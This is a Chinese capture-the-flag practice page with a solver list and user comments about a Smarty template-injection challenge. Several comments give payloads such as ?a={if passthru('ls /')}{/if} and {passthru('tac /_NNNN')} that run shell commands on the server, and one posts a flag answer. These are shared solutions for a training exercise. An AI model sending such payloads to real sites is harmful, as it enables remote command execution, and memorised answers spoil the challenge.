评分(11)
解题动态

smtall 攻破了该题 11小时前

heibaideshubao 攻破了该题 15小时前

GuyY2414514 攻破了该题 16小时前

zqx12345 攻破了该题 16小时前

cwxxj 攻破了该题 16小时前

sitinghong 攻破了该题 16小时前

425345305 攻破了该题 16小时前

13717479287 攻破了该题 16小时前

lgh1314520 攻破了该题 16小时前

156009445 攻破了该题 16小时前

AreX 攻破了该题 17小时前

whyareyourunnning 攻破了该题 17小时前

404lema 攻破了该题 1天前

Wwwwz 攻破了该题 1天前

yedaoshen 攻破了该题 1天前

qwertyuiplm 攻破了该题 1天前

emlan 攻破了该题 1天前

KaanTi 攻破了该题 1天前

3427251302 攻破了该题 1天前

评论
docker0w 7月前
举报
1. 随意构造URL参数获取源代码信息 ?test=test 2. 根据源代码得知使用Smarty 并搜索得知存在模板注入漏洞 3. 根据已过滤函数,使用passthru函数即可回显 4. 使用passthru执行命令 ls -a / 得到根据下存在start.sh 脚本信息 5. 根据脚本信息得知flag为随机生成在根路径下 且使用_下划线文件明名 6. 使用show_source获
bx33661 8月前
举报
?key={passthru("tac%20/_28710")}
yun20231227 8月前
举报
?key={{passthru('ls /')}}
xinkuang 10月前
举报
http://114.67.175.224:13208/?a={if%20passthru(%22more%20/_30010%22)}{/if}
YUMEKO 1年前
举报
http://xxxxxxx/?key={{passthru('tac ../../../_16018')}} key_16018 别看错了
Daniel2023 1年前
举报
flag{0e54d64e616af92957ddbb6c6ea37c5f}
一路奔腾 1年前
举报
?a={passthru("ls -al /")}找到特殊的一样_24542这样的文件,?f={passthru("tac%20/_13075")}查看文件内容得到flag。参考:https://zhuanlan.zhihu.com/p/401583380,,,,https://blog.csdn.net/m_de_g/article/details/120
EtHat 1年前
举报
index.php?a={passthru("tac /_4060")}
FUCK123 10月前
举报
fnmdp
18904484271 1年前
举报
好垃圾的靶场,明明flag出来了,但是提交显示不正确
haker111 1年前
举报
看提示直接传值:?a,然后看到源码后进行解析,了解smarty模板。进行get传参,?a={if passthru('ls')}{/if} 查看当前目录,然后转到根目录下,?a={if passthru('ls /')}{/if},每个人的根目录下的第一个子目录不同,所以flag不同,查看第一目录?a=?a={if passthru('tac /_2096')}{/if},得到flag{...}